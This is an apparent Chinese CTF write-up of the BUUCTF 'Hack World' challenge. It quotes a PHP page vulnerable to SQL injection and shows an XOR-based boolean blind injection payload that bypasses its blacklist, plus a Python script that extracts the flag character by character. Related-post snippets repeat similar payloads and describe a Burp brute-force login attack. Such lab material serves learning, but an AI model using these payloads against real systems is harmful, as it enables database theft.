【学习笔记7】buu [CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2024-06-05 15:00:00 发布
最新推荐文章于 2024-06-05 15:00:00 发布
阅读量235 收藏
点赞数 1
分类专栏: ctf 学习笔记 文章标签: mysql python php web servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107686928
版权

点开后就看到首行就有这么明显的提示,答案在flag表的,flag列里

尝试一下,发现除了1,2其他的都被过滤了,没有思路,不过最后在网上找到了,这道题的源码,刺激

<?php

$dbuser='root';

$dbpass='root';

function safe($sql){

    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');

    foreach($blackList as $blackitem){

        if(stripos($sql,$blackitem)){

            return False;

        }

    }

    return True;

}    //过滤了一堆,只要在黑名单就会报错

if(isset($_POST['id'])){

    $id = $_POST['id'];

}else{

    die();

}post穿个参数

$db = mysql_connect("localhost",$dbuser,$dbpass);

if(!$db){

    die(mysql_error());

}  如果不是db对应的值就显示连接mysql错误

mysql_select_db("ctf",$db);//mysql_select_db() 函数设置活动的 MySQL 数据库if(safe($id)){    //如果传入id通过safe方法的验证就可以执行一下的文件查询

    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");

 

    if($query){

        $result = mysql_fetch_array($query);

 

        if($result){

            echo $result['content'];

        }else{

            echo "Error Occured When Fetch Result.";

        }

    }else{

        var_dump($query);

    }

}else{

    die("SQL Injection Checked.");

}

根据1和2的返回值不同可以,推测是布尔盲注,()没有被过滤,尝试用异或绕过试一试

1^1^1返回值于1相同

1^2^1返回值于2相同

其实在这里就是异或就是起到了or的作用

构造payload:

if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)

返回值于1相同,接下来就是利用二分法跑脚本找结果了

import requests

import time

url = "http://be7c3bbe-f847-4c30-bfbd-baa005a54773.node3.buuoj.cn/index.php"

payload = {

"id" : ""

}

result = ""

for i in range(1,100):

l = 33

r =130

mid = (l+r)>>1

while(l<r):

payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)

html = requests.post(url,data=payload)

print(payload)

if "Hello" in html.text:

l = mid+1

else:

r = mid

mid = (l+r)>>1

if(chr(mid)==" "):

break

result = result + chr(mid)

print(result)

print("flag: " ,result)

Noslpum
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
m0_68074153的博客
08-13 407
sql盲注
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 1056
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
[CISCN2019 华北赛区 Day2 Web1]Hack World1
最新发布
2301_78919866的博客
06-05 677
[CISCN2019 华北赛区 Day2 Web1]Hack World1题解
BUUCTF - Web - [CISCN2019 华北赛区 Day2 Web1]Hack World
1tachi的博客
12-18 293
[CISCN2019 华北赛区 Day2 Web1]Hack World 测试 id=1 id=2 fuzz 一下,空格/union/order by/updatexml/and/or等字符 分析 尝试盲注,题目给出表及字段,使用异或连接,用括号代替空格 0^(ascii(substr((select(flag)from(flag)),1,1))>1) 脚本 import requests url="http://9fbcd2c9-29c1-45ee-8aa2-d17756ace4c0.no
【复习】[CISCN2019 华北赛区 Day2 Web1]Hack World -----sql注入
Zero_Adam的博客
05-16 413
目录:一、自己做:二、 学到的:不足: 一、自己做: 输入1和2 的时候是有正常的查询结果的。然后输入3的话就超过了。 输入其他的,不是id数字的就直接bool (false) 然后fuzz测试:482是给过滤的。 过滤了不少,仔细看一下, handler过滤了。像强网杯的那些就不行了。 information 被过滤了。可以用那些sys来查找表明,然后用无列名注入就好。 limit 被过滤了。要么就union select 要么就不用了。 或,与过滤了。可以用 ^异或。 空格,注释符,/**/
BUUCTF之[CISCN2019 华北赛区 Day2 Web1]Hack World ------- Boolean盲注
weixin_44632787的博客
10-05 379
第一眼看这题的时候还以为是堆叠查询,结果试了下发现并不是。然后试着试着发现这题其实是个bool盲注题。然后再写个Python脚本暴力破解就可以了(其实解题思路并不是自己想出来的,只是这题之前做过很多次了。所以现在再做的时候有印象) 这题没什么难的,主要知识点就是bool盲注。还有就是空格需要用括号()来绕过 先说一下网上找来的别的大佬的Payload # -*- coding:utf-8 -*- import requests import string def blind_injection(url).
buu做题笔记——[BJDCTF2020]ZJCTF,不过如此&CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_46330722的博客
11-05 376
BUU[BJDCTF2020]ZJCTF,不过如此CISCN2019 华北赛区 Day2 Web1]Hack World [BJDCTF2020]ZJCTF,不过如此 题目源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<
buu-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
qaq517384的博客
10-10 267
F12能看到提示 ?file猜测文件包含,先是伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php <?php //index.php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isset($file)){
BUU BRUTE 1 1
09-18
BUU BRUTE 1是一个爆破任务,根据引用所述,首先尝试爆破用户名,可以选择一个适合的字典进行爆破。接着,根据引用所述,可以切换到密码爆破模式,使用适当的字典或数字列表进行爆破。最后,根据引用所述,通过查看响应来获取flag。具体操作步骤如下: 1. 打开Burp Suite,配置代理并将目标网站的浏览器流量通过Burp Suite代理。 2. 在Burp Suite的Intruder选项卡中,将攻击类型设置为Cluster Bomb。 3. 在Payload Options中,选择Simple List作为Payload类型,并加载合适的用户名爆破字典。 4. 去掉Payload Encoding选项中的勾选。 5. 点击Start Attack开始用户名爆破。 6. 根据引用所述,接着切换到密码爆破模式。在Payload Options中,将Payload类型设置为Numbers,或继续使用Simple List加载包含0000~9999的密码字典。 7. 再次点击Start Attack开始密码爆破。 8. 查看响应,找到正确的密码并获取flag。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值